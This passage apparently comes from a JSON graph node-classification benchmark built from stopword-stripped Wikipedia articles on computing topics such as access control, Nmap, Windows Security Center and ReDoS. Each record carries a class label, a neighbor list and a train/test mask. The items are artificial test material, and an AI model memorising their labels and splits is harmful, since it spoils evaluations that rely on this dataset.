passwords common means verifying user identity access given information systems addition fourth factor authentication recognized someone know whereby another person knows provide human element authentication situations systems set allow scenarios example user may password forgotten smart card scenario user known designated cohorts cohorts may provide smart card password combination extant factor user question thus provide two factors user missing credential giving three factors overall allow access credential physical/tangible object piece knowledge facet person physical enables individual access given physical facility computer-based information system typically credentials something person knows number pin something access badge something biometric feature combination items known multi-factor authentication typical credential access card key-fob newer software also turn users smartphones access devices many card technologies including magnetic stripe bar code wiegand 125 khz proximity 26-bit card-swipe contact smart cards contactless smart cards also available key-fobs compact id cards attach key ring biometric technologies include fingerprint facial recognition iris recognition retinal scan voice hand geometry built-in biometric technologies found newer smartphones also used credentials conjunction access software running mobile devices addition older traditional card access technologies newer technologies near field communication nfc bluetooth low energy also potential communicate user credentials readers system building access access control point door turnstile parking gate elevator physical barriers granting access electronically rely users credentials biometric fingerprints face card readers pin typically access point door electronic advanced access control door contain several elements basic stand-alone electric lock lock unlocked operator switch automate operator intervention replaced reader reader could keypad code entered could card reader could biometric reader readers usually make access decision send card number access control panel verifies number access list monitor door position magnetic door switch used concept door switch unlike refrigerators car doors generally entry controlled exit uncontrolled cases exit also controlled second reader used opposite side door cases exit controlled free exit device called request-to-exit rex used request-to-exit devices push-button motion detector button pushed motion detector detects motion door door alarm temporarily ignored door opened exiting door without electrically unlock door called mechanical free egress important safety feature cases lock must electrically unlocked exit request-to-exit device also unlocks door access control decisions made comparing credential access control list look-up done host server access control panel reader development access control systems seen steady push look-up central host edge system reader predominant topology circa 2009 hub spoke control panel hub readers spokes look-up control functions control panel spokes communicate serial connection usually rs-485 manufactures pushing decision making edge placing controller door controllers ip enabled connect host database using standard networks access control readers may classified functions able perform readers may additional features lcd function buttons data collection purposes i.e clock-in/clock-out events attendance reports camera/speaker/microphone intercom smart card read/write support access control readers may also classified type identification technology 1 serial controllers controllers connected host pc via serial rs-485 communication line via 20ma current loop older systems external rs-232/485 converters internal rs-485 cards installed standard pcs rs-485 communication ports advantages disadvantages 2 serial main sub-controllers door hardware connected sub-controllers a.k.a door controllers door interfaces sub-controllers usually make access decisions instead forward requests main controllers main controllers usually support 16 32 sub-controllers advantages disadvantages 3 serial main controllers intelligent readers door hardware connected directly intelligent semi-intelligent readers readers usually make access decisions forward requests main controller connection main controller unavailable readers use internal database make access decisions record events semi-intelligent reader database function without main controller used areas require high security main controllers usually support 16 64 readers advantages disadvantages ones listed second paragraph 4 serial controllers terminal servers spite rapid development increasing use computer networks access control manufacturers remained conservative rush introduce network-enabled products pressed solutions network connectivity many chose option requiring less efforts addition terminal server device converts serial data transmission via lan wan advantages disadvantages rs-485-related advantages disadvantages also apply 5 network-enabled main controllers topology nearly described second third paragraphs advantages disadvantages apply on-board network interface offers couple valuable improvements transmission configuration user data main controllers faster may done parallel makes system responsive interrupt normal operations special hardware required order achieve redundant host pc setup case primary host pc fails secondary host pc may start polling network controllers disadvantages introduced terminal servers listed fourth paragraph also eliminated 6 ip controllers controllers connected host pc via ethernet lan wan advantages disadvantages 7 ip readers readers connected host pc via ethernet lan wan advantages disadvantages advantages disadvantages ip controllers apply ip readers well common security risk intrusion access control system simply following legitimate user door referred tailgating often legitimate user hold door intruder risk minimized security awareness training user population active means turnstiles high security applications risk minimized using sally port sometimes called security vestibule mantrap operator intervention required presumably assure valid identification second common risk levering door open relatively difficult properly secured doors strikes high holding force magnetic locks fully implemented access control systems include forced door monitoring alarms vary effectiveness usually failing high false positive alarms poor database configuration lack active intrusion monitoring newer access control systems incorporate type door prop alarm inform system administrators door left open longer specified length time third common security risk natural disasters order mitigate risk natural disasters structure building quality network computer equipment vital organizational perspective leadership need adopt implement hazards plan incident response plan highlights incident plan determined national incident management system must include pre-incident planning incident actions disaster recovery action review similar levering crashing cheap partition walls shared tenant spaces divisional wall vulnerability vulnerability along lines breaking sidelights spoofing locking hardware fairly simple elegant levering strong magnet operate solenoid controlling bolts electric locking hardware motor locks prevalent europe us also susceptible attack using doughnut shaped magnet also possible manipulate power lock either removing adding current although access control systems incorporate battery back-up systems locks almost always located secure side door access cards proven vulnerable sophisticated attacks enterprising hackers built portable readers capture card number user proximity card hacker simply walks user reads card presents number reader securing door possible card numbers sent clear encryption used counter dual authentication methods card plus pin always used many access control credentials unique serial numbers programmed sequential order manufacturing known sequential attack intruder credential used system simply increment decrement serial number find credential currently authorized system ordering credentials random unique serial numbers recommended counter threat finally electric locking hardware still mechanical keys fail-over mechanical key locks vulnerable bumping need know principle enforced user access controls authorization procedures objective ensure authorized individuals gain access information systems necessary undertake duties computer security general access control includes authentication authorization audit narrow definition access control would cover access approval whereby system makes decision grant reject access request already authenticated subject based subject authorized access authentication access control often combined single operation access approved based successful authentication based anonymous access token authentication methods tokens include passwords biometric scans physical keys electronic keys devices hidden paths social barriers monitoring humans automated systems access-control model entities perform actions system called subjects entities representing resources access may need controlled called objects see also access control matrix subjects objects considered software entities rather human users human users effect system via software entities control although systems equate subjects user ids processes started user default authority level control fine-grained enough satisfy principle least privilege arguably responsible prevalence malware systems see computer insecurity models example object-capability model software entity potentially act subject object access-control models tend fall one two classes based capabilities based access control lists acls capability-based acl-based models mechanisms allow access rights granted members group subjects often group modeled subject access control systems provide essential services authorization identification authentication access approval accountability access accounts enforced many types controls telecommunication term access control defined u.s. federal standard 1037c following meanings definition depends several technical terms federal standard 1037c object-oriented programming languages access control part apparatus achieving encapsulation one four fundamentals object-oriented programming goal establish clear separation interface visible accessible parts class implementation internal representation helper methods also known data hiding ensures exclusive data access class members variables methods protects object integrity preventing corruption client programmer/ client classes rule thumb use restrictive access level data unless compelling reason expose also helps reduce interdependencies classes leading lower coupling fewer regression bugs object-oriented programming access control typically implemented using access modifiers object class although access modifiers may syntactically different languages attempt achieve goal define variables methods visible several programming languages e.g java c++ c ruby use public protected private access modifiers keywords allow programmer establish access levels classes class members data methods exact use programming language varied depending language philosophy similarities differences note ruby private methods always self implicit receiver therefore used current object languages mechanisms override access modifies gain access private components object one example friend class c++ special public member methods accessors aka getters mutator methods often called setters used control changes class variables order prevent unauthorized access data corruption public policy access control restrict access systems authorization track monitor behavior within systems accountability implementation feature using trusted systems security social control",
    "neighbors": [
      5636,
      9745,
      8210,
      3612,
      10268,
      9248,
      2083,
      3624,
      1579,
      6708,
      3125,
      4663,
      3133,
      10815,
      2630,
      10823,
      2128,
      4689,
      10835,
      10340,
      4198,
      3178,
      8302,
      119,
      2699,
      3723,
      5774,
      3215,
      6308,
      6309,
      3750,
      8881,
      3262,
      2756,
      3780,
      7368,
      5325,
      6350,
      5327,
      9423,
      210,
      5331,
      5334,
      10968,
      4313,
      2779,
      9442,
      9958,
      5363,
      3833,
      4348,
      5373,
      4349,
      11526,
      5387,
      5389,
      9488,
      11030,
      6937,
      5403,
      7965,
      5407,
      3360,
      1314,
      6950,
      3887,
      4912,
      11567,
      1334,
      5433,
      5435,
      5947,
      11589,
      6471,
      2889,
      4435,
      10580,
      2901,
      1368,
      7515,
      4448,
      5472,
      9059,
      3944,
      7016,
      2932,
      3444,
      6541,
      2959,
      3480,
      7068,
      1961,
      9646,
      10673,
      8633,
      6586,
      8637,
      3521,
      4034,
      5573,
      8645,
      4039,
      7626,
      3532,
      5077,
      8150,
      11221,
      2013,
      10207,
      4067,
      3044,
      1511,
      3560,
      4583,
      11244,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2738,
    "label": 2,
    "text": "4MLinux:4mlinux 4mlinux lightweight distribution made 32bit 64bit architectures named 4mlinux since 4 main components os maintenance used rescue live cd multimedia inbuilt support almost every multimedia format miniserver comes 64-bit server included running lamp suite mystery includes collection classic linux games distribution developed poland first released 2010 distribution include package manager uses jwm joe window manager default window manager also comes conky preinstalled installing programs distribution distribution retrieve windows version rather linux version due coming pre-installed wine compatibility layer windows applications package manager distribution geared towards people prefer lightweight distribution version distribution called 4mlinux game edition provides 90s games natively doom hexen distribution comes two different version 4mserver 4mlinux 4mlinux requires 128 mb ram installed hdd 1024 mb ram used live cd/usb whereas 4mserver requires 256 mb ram installed hdd 2048 mb ram used live cd/usb",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      1632,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 2739,
    "label": 4,
    "text": "Nmap:nmap nmap network mapper free open-source network scanner created gordon lyon also known pseudonym fyodor vaskovich nmap used discover hosts services computer network sending packets analyzing responses nmap provides number features probing computer networks including host discovery service operating system detection features extensible scripts provide advanced service detection vulnerability detection features nmap adapt network conditions including latency congestion scan nmap started linux utility ported systems including windows macos bsd linux popular platform followed windows nmap features include nmap provide information targets including reverse dns names device types mac addresses typical uses nmap nmapfe originally written zach smith nmap official gui nmap versions 2.2 4.22 nmap 4.50 originally 4.22soc development series nmapfe replaced zenmap new official graphical user interface based umit developed adriano monteiro marques various web-based interfaces allow controlling nmap analysing nmap results web browser include nmap-cgi ivre microsoft windows specific guis exist including nmapwin updated since june 2003 v1.4.0 nmapw syhunt nmap provides four possible output formats interactive output saved file nmap output manipulated text processing software enabling user create customized reports nmap first published september 1997 article phrack magazine source-code included help contributions computer security community development continued enhancements included operating system fingerprinting service fingerprinting code rewrites c c++ additional scan types protocol support e.g ipv6 sctp new programs complement nmap core features major releases include nmap tool used discover services running internet connected systems like tool could potentially used black hat hacking precursor attempts gain unauthorized access computer systems however nmap also used security systems administration assess networks vulnerabilities i.e white hat hacking system administrators use nmap search unauthorized servers computers conform security standards jurisdictions unauthorized port scanning illegal nmap originally distributed gnu public license gpl later releases nmap authors added clarifications specific interpretations license felt gpl unclear lacking instance nmap 3.50 specifically revoked license sco group distribute nmap software views sco-linux controversies matrix reloaded trinity seen using nmap access power plant computer system allowing neo physically break building appearance nmap film widely discussed internet forums hailed unusually realistic example hacking nmap nmapfe used listening 2006 movie former nsa officer defects mounts clandestine counter-listening station high italian alps nmap source code seen movie battle royale well brief views command line version nmap executing live free die hard bourne ultimatum 2013 nmap continued make appearances movies including popular sci-fi movie elysium film dredd film adaptation famous judge dredd comics released 2012 also contains multiple nmap scenes nmap used network reconnaissance exploitation slum tower network even seen briefly movie trailer command nmap widely used video game hacknet allowing probe network ports target system hack snowden nmap used aptitude test scene 14 minutes movie nmap integral part academic activities used research involving tcp/ip protocol suite networking general well research tool nmap become research topic",
    "neighbors": [
      3714,
      1541,
      9735,
      10633,
      6797,
      3473,
      4369,
      6548,
      1429,
      3094,
      4373,
      5402,
      161,
      10020,
      4005,
      8998,
      4777,
      939,
      9771,
      10924,
      3503,
      1200,
      5935,
      7983,
      8497,
      9393,
      5045,
      7989,
      823,
      9780,
      9146,
      7228,
      3006,
      11202,
      2887,
      6345,
      842,
      1232,
      3539,
      8791,
      11607,
      4186,
      8922,
      3292,
      4956,
      5470,
      479,
      11486,
      3169,
      4580,
      5990,
      8554,
      5612,
      4589,
      7411,
      8692,
      502,
      7031,
      5113,
      2045,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 2740,
    "label": 1,
    "text": "Online_complex_processing:online complex processing online complex processing olcp class realtime data processing involving complex queries lengthy queries and/or simultaneous reads writes records",
    "neighbors": [
      5658
    ],
    "mask": "Test"
  },
  {
    "node_id": 2741,
    "label": 1,
    "text": "Generic_Mapping_Tools:generic mapping tools generic mapping tools gmt open-source collection computer software tools processing displaying xy xyz datasets including rasterisation filtering image processing operations various kinds map projections software stores 2-d grids coards-compliant netcdf files comes comprehensive collection free gis data coast lines rivers political borders coordinates geographic objects users convert data like satellite imagery digital elevation models sources import gmt stores resulting maps diagrams postscript ps encapsulated postscript eps format users operate system command line enables scripting automation routine tasks less comprehensive graphic user interfaces available third parties well web applications bringing system functionality online paul wessel walter h. f. smith created gmt 1988 lamont-doherty earth observatory officially releasing october 7 1991 gnu general public license letters gmt originally stood gravity magnetism topography three basic types geophysical data besides strong support visualisation geographic data sets software includes tools processing manipulating multi-dimensional datasets gmt users geoscientists",
    "neighbors": [
      7983,
      8628,
      5397,
      823,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2742,
    "label": 4,
    "text": "Macau_Computer_Emergency_Response_Team_Coordination_Centre:macau computer emergency response team coordination centre macau computer emergency response team coordination centre mocert managed macau new technologies incubator centre providing macau computer security incident handling information promoting information security awareness well coordinating computer security incident response public local enterprises mocert collaborates local bodies also communicates exchange information members first forum incident response security teams apcert asia pacific computer emergency response teams mocert mission facilitate healthy secure internet environment macau mocert provides latest computer vulnerabilities discovered around world publishes latest security issues advisories website individuals organizations also register free mocert subscriber get latest related information email organization also provides advice best way handle computer incident free mocert accepts reports computer security related incidents example phishing malware malicious website phoney emails attachments information security attacks mocert organizes relevant seminars events macao constituency regular basis promote information security awareness macao public events topics altered according current issues facing macao mocert complements seminars events print material form leaflet booklets sections constituency requires awareness guidance information security",
    "neighbors": [
      7515,
      5636,
      10190,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2743,
    "label": 3,
    "text": "Road_Blaster:road blaster laserdisc-based arcade games time gameplay consists on-screen instructions overlaid pre-recorded full motion video animated footage high-speed chases vehicular combat player controls cross-hair steer car toward correct directions according green arrows flashing beeping beside controlling gas pedal brake booster whenever light game nine stages upon successfully completing level player graded reaction time different difficulty levels selected normal mode pop-up icons audio tones signal turn left right brake hit turbo hit cars hard mode on-screen icons guide player story road blaster inspired revenge thriller films mad max takes place post-apocalyptic wasteland late 1990s united states future time game release player assumes role vigilante drives customized sports car order get revenge biker gang responsible wife death honeymoon recovering injuries upgrades car goes rampage nine areas goal seek gang female boss complete vengeance road blaster uses animation provided anime studio toei animation animated guidance yoshinobu inano also directed key-animated films animated using 15,000 hand-painted cels produce 30 minutes animation game director yoshihisa kishimoto previously worked cobra command later directed arcade version double dragon car road blaster seen inside lee brothers garage start game road blaster originally released 1985 laserdisc-based arcade game various ports released throughout including versions msx x1 mega cd/sega cd laseractive mega ld format sega saturn playstation 3do interactive multiplayer prototyped turbo blaster however sega cd mega ld versions released outside japan titles road avenger road prosecutor respectively titles possibly changed avoid confusion similarly titled arcade game roadblasters atari games ported mega drive around time road blaster also released sharp x68000 windows 2011 exclusively japan cobra command road blaster ported ios revolutionary concepts 2010 2011 respectively variations included one-shot reproductions vhs cassette players takara video challenger limited interactive port road blaster arcade game sega saturn playstation ports compilations road blaster another laserdisc arcade game developed team titled thunder storm known outside japan cobra command unofficial super nes port also released 2011 however game relies heavily msu1 media enhancement chip somewhat new chip allows 4gb additional storage space full motion video playback stereo pcm audio early 2018 another unofficial port released commodore amiga ocs aga versions released based mega cd version dragon reviewers gave sega cd version game 4 5 stars 1993 gamefan noted greater interaction compared time gal thunderstorm praised non-stop control vehicle graphics smooth animation andrenaline rush experience gamepro praised highly detailed animation stereo cd sound called masterpiece like participating intense action-packed animated movie release famitsu gave mega cd version score 32 40 mega rated 86 famitsu later scored sega saturn version 25 40 playstation version 23 40 ios port released generally favourable reviews including scores 8 10 ign 7 10 pocket gamer novelization game announced 2009 project officially authorized g-mode japan rights holder data east catalog written mary margaret park",
    "neighbors": [
      1921,
      2436,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2744,
    "label": 6,
    "text": "Partition_table:partition table partition fixed-size subset disk drive treated unit operating system partition table table maintained disk operating system describing partitions disk terms partition table partition map commonly associated mbr partition table master boot record mbr ibm pc compatibles may used generically refer formats divide disk drive partitions guid partition table gpt apple partition map apm bsd disklabel partitions created resized deleted called disk partitioning usually done installation operating system also possible make changes partitions operating system installed",
    "neighbors": [
      6939,
      1801,
      1071,
      7983,
      2545,
      1970,
      8857,
      2811,
      8572
    ],
    "mask": "None"
  },
  {
    "node_id": 2745,
    "label": 3,
    "text": "Wait_state:wait state wait state delay experienced computer processor accessing external memory another device slow respond computer microprocessors generally run much faster computer subsystems hold data cpu reads writes even memory fastest supply data fast cpu could process example 2011 typical pc processors like intel core 2 amd athlon 64 x2 run clock several ghz means one clock cycle less 1 nanosecond typically 0.3 ns 0.5 ns modern desktop cpus main memory latency 15–30 ns second-level cpu caches run slower processor core processor needs access external memory starts placing address requested information address bus must wait answer may come back tens hundreds cycles later cycles spent waiting called wait state wait states pure waste processor performance modern designs try eliminate hide using variety techniques cpu caches instruction pipelines instruction prefetch branch prediction simultaneous multithreading others single technique 100 successful together significantly reduce problem wait states used reduce energy consumption processor allowing main processor clock either slow temporarily pause wait state cpu work rather spinning uselessly tight loop waiting data sporadically reducing clock speed manner helps keep processor core cool extend battery life portable computing devices ibm mainframes term wait state used different meaning wait state refers cpu halted possibly due kind serious error condition unrecoverable error operating system ipl wait state indicated bit 14 psw set 1 bits psw providing wait state code giving reason wait z/architecture mode wait state code found bits 116-127",
    "neighbors": [
      7607,
      10692,
      6950,
      5503,
      1801,
      3615,
      8078,
      10734,
      1776,
      7505,
      7218,
      563,
      8501,
      663,
      731,
      799
    ],
    "mask": "Test"
  },
  {
    "node_id": 2746,
    "label": 5,
    "text": "Advanced_Data_Communication_Control_Procedures:advanced data communication control procedures telecommunication advanced data communication control procedures protocol adccp bit-oriented data link layer protocol used provide point-to-point point-to-multipoint transmission data frames contain error control information places data network ensures proper delivery destination adccp based ibm sdlc protocol hdlc iso lapb itu/ccitt based adccp adccp ansi standard x3.66 derived ibm synchronous data link control sdlc protocol functionally equivalent iso high-level data link control hdlc standard adccp 3 main modes – nrm normal response mode akin sdlc abm asynchronous balanced mode akin hdlc arm asynchronous response mode",
    "neighbors": [
      1997,
      6544,
      7865,
      3323,
      4543
    ],
    "mask": "Test"
  },
  {
    "node_id": 2747,
    "label": 4,
    "text": "Wietse_Venema:wietse venema wietse zweitze venema born 1951 dutch programmer physicist best known writing postfix email system also wrote tcp wrapper collaborated dan farmer produce computer security tools satan coroner toolkit studied physics university groningen continuing get phd 1984 dissertation left-right symmetry nuclear beta decay spent 12 years eindhoven university systems architect mathematics computer science department spent part time writing tools electronic data interchange since emigrating u.s. 1996 2015 working ibm thomas j. watson research center new york state march 24 2015 announced leaving ibm google awards venema received work",
    "neighbors": [
      3172,
      3503,
      7605,
      8469,
      8791,
      3323,
      4349
    ],
    "mask": "Test"
  },
  {
    "node_id": 2748,
    "label": 5,
    "text": "Ipswitch_IMail_Server:ipswitch imail server imail handle many 300,000 users average message flow ~25 per second ~2 million day support 32 64 bit platforms iis/.net framework 2.0 smtp pop3 imap4 ldap protocol support rfc 1870 compliant business computing world review imail server premium v11.01 pc magazine voted imail server editor choice – march 2009 network computing awards 2008 messaging product year",
    "neighbors": [
      471,
      5063,
      10248,
      76,
      8332,
      5230,
      11500,
      8976,
      9909,
      4439,
      412
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2749,
    "label": 2,
    "text": "Security_and_Maintenance:security maintenance security maintenance formerly known action center security center earlier versions component windows nt family operating systems monitors security maintenance status computer monitoring criteria includes optimal operation antivirus software personal firewall well working status backup restore network access protection nap user account control uac windows error reporting wer windows update notifies user problem monitored criteria antivirus program up-to-date offline security maintenance consists three major components control panel applet windows service application programming interface api provided windows management instrumentation wmi control panel applet divides monitored criteria categories color-codes yellow indicates non-critical warning e.g settings monitored optimal red indicates critical message e.g anti-virus program offline service named security center determines current state settings service default starts computer starts continually monitors system changes notifies user detects problem versions windows prior windows 10 adds notification icon windows taskbar wmi provider makes settings available system third-party anti-virus anti-spyware personal firewall software vendors primarily register security maintenance wmi provider windows vista added new set apis let programs retrieve aggregate health status within security maintenance receive notifications health status changes apis allow programs confirm system healthy state engaging certain actions example computer game ensure firewall running connecting online game security maintenance charge following microsoft learned discussions customers confusion whether users taking appropriate steps protect systems steps taking effective research microsoft made decision include visible control panel windows xp service pack 2 would provide consolidated view important security features service pack 2 released august 2004 includes first version windows security center wsc version monitors windows update windows firewall availability anti-virusprogram third-party providers personal firewall anti-virus software packages encouraged use wsc api register products wsc 25 august 2004 pc magazine published article security watch newsletter titled windows xp sp2 security center spoofing threat outlined design vulnerability could allow malware manipulate security center displaying false security status regardless true security status malware requires administrative privileges microsoft countered claim asserting piece malware gains administrative privileges need spoof anything commit much nastier malicious actions wsc windows vista monitors new criteria anti-spyware software user account control internet explorer security settings also display logos third-party products registered security center unlike windows xp beta versions windows vista wsc could disabled overridden security software maker symantec spoke noting would cause great deal consumer confusion security problems would reported wsc symantec tools time mcafee another large security software vendor lodged similar complaints end microsoft allowed wsc disabled windows 7 windows security center renamed action center designed centralize reduce number notifications system encompasses security maintenance computer notification icon windows taskbar appears message perusal replaces five separate notification icons found windows vista troubleshooting link also added providing shortcut windows 7 new troubleshooting control panel windows 8 action center monitors 10 new items microsoft account windows activation smartscreen automatic maintenance drive status device software startup apps homegroup file history storage spaces windows 10 name action center used application notifications quick actions action center windows 8.1 renamed security maintenance causing confusion users administrators longer displays icon notification area otherwise retains features windows 8.1 action center troubleshooting link removed windows 10 fall creators update starting windows 10 creators update microsoft introduced new component called windows defender security center wdsc provides much functionality new component universal windows platform app also default front-end windows defender relies service called windows defender security center service comparison security maintenance wdsc",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      8753,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      8296,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      2213,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      704,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      8024,
      5465,
      9569,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1417,
      1418,
      5003,
      5004,
      8080,
      11667,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 2750,
    "label": 4,
    "text": "Economics_of_security:economics security economics information security addresses economic aspects privacy computer security economics information security includes models strictly rational “ homo economicus ” well behavioral economics economics security addresses individual organizational decisions behaviors respect security privacy market decisions economics security addresses core question agents choose technical risks exists technical solutions mitigate security privacy risks economics addresses question also inform design decisions security engineering national security canonical public good economic status information security came intellectual fore around 2000 case innovations arose simultaneously multiple venues 2000 ross anderson wrote information security hard anderson explained significant difficulty optimal development security technology incentives must aligned technology enable rational adoption thus economic insights integrated technical design security technology enable party risk invest limit risk otherwise designers simply counting altruism adoption diffusion many consider publication birth economics security also 2000 harvard camp school government wolfram department economics argued security public good rather extant vulnerabilities associated negative externality value vulnerabilities defined work tradable goods six years later idefense zdi mozilla extant markets vulnerabilities 2000 scientists computer emergency response team carnegie mellon university proposed early mechanism risk assessment hierarchical holographic model provided first multi-faceted evaluation tool guide security investments using science risk since time cert developed suite systematic mechanism organizations use risk evaluations depending size expertise organization octave study computer security investment risk avoidance become standard practice 2001 unrelated development lawrence a. gordon martin p. loeb published using information security response competitor analysis systems working paper published article written 2000 professors maryland smith school business present game-theoretic framework demonstrates information security prevent rival firms gaining sensitive information context article considers economic i.e. cost-benefit aspects information security authors came together develop expand series flagship events name workshop economics information security proof work security technology designed stop spam altering economics early paper economics information security argued proof work work fact finding proof work work without price discrimination illustrated later paper proof work work another finding one critical understanding current american data practices opposite privacy economic terms anonymity rather price discrimination privacy price discrimination authored andrew odlyzko illustrates may appear information pathology collection data fact rational organizational behavior hal varian presented three models security using metaphor height walls around town show security normal good public good good externalities free riding end result case lawrence a. gordon martin p. loeb wrote economics information security investment gordon-loeb model considered many first economic model determines optimal amount invest protect given set information model takes account vulnerability information security breach potential loss breach occur",
    "neighbors": [
      8302,
      4496,
      1941,
      9145,
      4956,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2751,
    "label": 9,
    "text": "TREE-META:tree-meta tree-meta tree meta treemeta translator writing system compiler-compiler system context-free languages originally developed 1960s parsing statements metalanguage resemble augmented backus–naur form embedded tree-building directives unparsing rules include extensive tree-scanning code-generation constructs tree-meta instrumental development on-line system ported many systems including univac 1108 ge 645 sds-940 icl 1906a perq ucsd p-system complete example tree-meta program extracted untested complete declarations conditionals blocks example appendix 6 icl 1900 tree-meta manual document also definition tree-meta tree-meta appendix 3 program recognizer also outputs assembly language input demonstrates one key features tree-meta tree pattern matching used lhs get val example rhs add sub algol-style comment delimited",
    "neighbors": [
      10560,
      9926,
      1552,
      2065,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 2752,
    "label": 5,
    "text": "Automatic_repeat_request:automatic repeat request automatic repeat request arq also known automatic repeat query error-control method data transmission uses acknowledgements messages sent receiver indicating correctly received packet timeouts specified periods time allowed elapse acknowledgment received achieve reliable data transmission unreliable service sender receive acknowledgment timeout usually re-transmits packet sender receives acknowledgment exceeds predefined number retransmissions types arq protocols include stop-and-wait arq go-back-n arq selective repeat arq/selective reject arq three protocols usually use form sliding window protocol tell transmitter determine packets need retransmitted protocols reside data link transport layers layers 2 4 osi model transmission control protocol uses variant go-back-n arq ensure reliable transmission data internet protocol provide guaranteed delivery packets selective acknowledgement sack uses selective repeat arq itu-t g.hn standard provides way create high-speed 1 gbit/s local area network using existing residential wiring power lines telephone lines coaxial cables uses selective repeat arq ensure reliable transmission noisy media arq systems widely used shortwave radio ensure reliable delivery data telegrams systems came forms called arq-e arq-m also included ability multiplex two four channels number patents exist use arq live video contribution environments high throughput environments negative acknowledgements used drive overheads",
    "neighbors": [
      5472,
      1154,
      10947,
      8741,
      3273,
      10924,
      2701,
      9230,
      5071,
      2640,
      4691,
      2772,
      7865,
      2329,
      2203,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 2753,
    "label": 3,
    "text": "Rock_n'_Bolt:rock n bolt rock n bolt puzzle video game developed action graphics published 1984 activision colecovision commodore 64 msx sg-1000 objective game lock platforms place according supplied map three levels difficulty second third level time limits",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2754,
    "label": 4,
    "text": "ReDoS:redos regular expression denial service redos algorithmic complexity attack produces denial-of-service providing regular expression takes long time evaluate attack exploits fact regular expression implementations exponential time worst case complexity time taken grow exponentially relation input size attacker thus cause program spend unbounded amount time processing providing regular expression either slowing becoming unresponsive regular expression matching done building finite-state automaton regular expressions easily converted nondeterministic automata nfas state input symbol may several possible next states building automaton several possibilities exist algorithms first two problematic first problematic deterministic automaton could formula_1 states formula_2 number states nondeterministic automaton thus conversion nfa dfa may take exponential time second problematic nondeterministic automaton could exponential number paths length formula_3 walking input length formula_3 also take exponential time last two algorithms however exhibit pathological behavior note non-pathological regular expressions problematic algorithms usually fast practice one expect compile regular expression time match n time instead simulation nfa lazy computation dfa mn worst-case complexity regular expression denial service occurs expectations applied regular expressions provided user malicious regular expressions provided user trigger worst-case complexity regular expression matcher regex algorithms written efficient way regular expression engines existence extend regular expression languages additional constructs always solved efficiently extended patterns essentially force implementation regular expression programming languages use backtracking malicious regexes get stuck crafted input different depending regular expression matcher attack backtracking matchers occur whenever factors occur second condition best explained example regular expression codice_1 match repeated subexpression codice_2 therefore matching nondeterministic automaton may try new match codice_2 new match input many consecutive double number possible paths automaton examples malicious regexes include following susceptible input minimum input length might change slightly using faster slower machines patterns may cause exponential behavior long enough inputs hundreds characters usually could still cause long elaboration times example pattern codice_9 input arbitrarily long sequence s. pattern may also cause backtracking matchers hang so-called evil malicious regexes found online regular expression repositories note enough find evil sub expression order attack full regex two examples also susceptible input regex affected user input attacker inject malicious regex make system vulnerable therefore cases regular expression denial service avoided removing possibility user execute arbitrary patterns server case web applications databases main vulnerable applications alternatively malicious page could hang user web browser cause use arbitrary amounts memory however examples paragraphs considerably less artificial others thus demonstrate vulnerable regexes may used result programming mistakes case e-mail scanners intrusion detection systems could also vulnerable fortunately cases problematic regular expressions rewritten non-evil patterns example codice_8 rewritten codice_13 case web application programmer may use regular expression validate input client server side system attacker could inspect client code looking evil regular expressions send crafted input directly web server order hang",
    "neighbors": [
      1952,
      11487,
      10852,
      8262,
      4488,
      2409,
      6536,
      6347,
      2060,
      9293,
      6735,
      7091,
      5245,
      9688,
      953,
      3581,
      9727
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2755,
    "label": 6,
